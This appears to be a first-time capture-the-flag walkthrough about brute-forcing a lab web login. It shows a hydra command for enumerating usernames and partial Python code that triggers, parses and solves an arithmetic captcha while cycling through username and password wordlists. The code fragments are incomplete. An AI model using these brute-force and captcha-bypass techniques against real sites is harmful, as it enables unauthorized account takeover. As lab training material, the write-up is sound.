Welcome! Thanks for checking out my walkthrough. This room was simple to understand, but needed a little bit of custom automation that could potentially take longer than some rooms. I will walkthrough what I did in order to crack the username and password for this website.

Included in the room was a zip file which included two text files: usernames.txt and passwords.txt. This pretty much told me from the start that I would be cracking some usernames and passwords.

When I first saw the login screen on the web application, my assumptions were confirmed.

I saw that trying to login with wrong credentials left an error at the bottom of the page.

In order to see what was going on under the hood, I opened up Burp Suite and checked out the raw HTTP request. I could see the data sent and what the response was from the server.

With the information I gathered I decided to use hydra to try to crack both usernames and passwords. First trying to crack the usernames, I entered the command:

hydra -L usernames.txt -p password -t 64 -s 80 10.10.204.24 http-post-form "/login:username=^USER^&password=^PASS^:Error\: The user " 

Here I used the usernames.txt to enumerate the usernames. After trying this for a few minutes, I noticed that this wasn't returning what I would hope. After troubleshooting hydra and trying to figure out what potential command mistake I made, I looked at the website again only to find that the login page had changed!

A captcha! Uh-oh. I've never dealt with breaking one of these before. After playing around in Burp Suite a while longer, I learned that the captcha from the previous page was the answer for the new login page. So the data needed to post correctly would be username, password, and captcha. In order to crack this login, it seems that I would have to write a custom script.

From what I learned about the web application, I had to create a script that would do the following:

• Load both usernames.txt and passwords.txt into the program.
• Trigger the captcha.
• Find way to identify the elements in the captcha:
  • Opperands
  • Operant
• Send correct captcha to the server while enumerating usernames.txt.
• Once username is found, enumerate passwords.txt
• Print out correct username and password.

I used these tasks to break my code into smaller parts. The actual code is available at the top of this page, but you can also access it here.

• Load both usernames.txt and passwords.txt into the program.

# load list of usernames
def load_users():
	users = list()
	with open("usernames.txt") as f:
		for line in f:
			users.append(line.rstrip('\n'))
	print('[+] Loaded ' + str(len(users)) + ' usernames to attempt.')
	return users

# loads list of passwords
def load_passwords():
	passwords = list()
	with open("passwords.txt") as f:
		for line in f:
			passwords.append(line.rstrip('\n'))
	print('[+] Loaded '+ str(len(passwords)) + ' passwords to attempt.')
	return passwords

• Trigger the captcha.

# sends 10 requests in order start the captcha
for i in range(10):
	data = {
	'username': 'username',
	'password': 'password'
	}
	r = requests.post(url,data=data)
	print("[+] Sent "+ str(i+1) + "/10 requests to trigger captcha.", end = '\r')

• Find way to identify the elements in the captcha:
  • Opperands
  • Operant

# username and password
person = ''
password = ''

# data used for post request
	length = len(password) -1
	data = {
	'username': username,
	'password': password,
	'captcha': cap
	}

	# Data used to find captcha
	r = requests.post(url,data=data)
	eq = r.text[1839 + length:1847 + length]
	
	# if statement that returns when the page is authenticated
	if eq == '':
		print('[+] Password found: ' + password)
		return -1

	num1 = int(eq[:3])
	num2 = int(eq[6:8])
	opp = eq[4]

    # finding out which operator to use for captcha equasion
	if opp == '+':
		cap = num1 + num2
	elif opp == '-':
		cap = num1 - num2
	else:
		cap = num1 * num2

    return cap

• Send correct captcha to the server while enumerating usernames.txt.
• Once username is found, enumerate passwords.txt

# iterates through usernames list
for name in users:
	cur = send_request(name, 'password', cur)
	if cur == -1:
		person = person + name
		break;

passwords = load_passwords()

# iterates through password list
for p in passwords:

	cur = last_request(person, p, cur)
	if cur == -1:
		password = password + p
		break

• Print out correct username and password.

# final print of username and password
print('[+] Username: ' + person)
print('[+] Password: ' + password)

After a lot of trial and error building the script, it ended up cracking both the username and the password.

When I logged on with the information, I got the flag.

Thanks for checking out my writeup! It's my first one, so if there are any comments or criticisms, I would love to hear them.

If you have any feedback, please reach out to me at [email protected].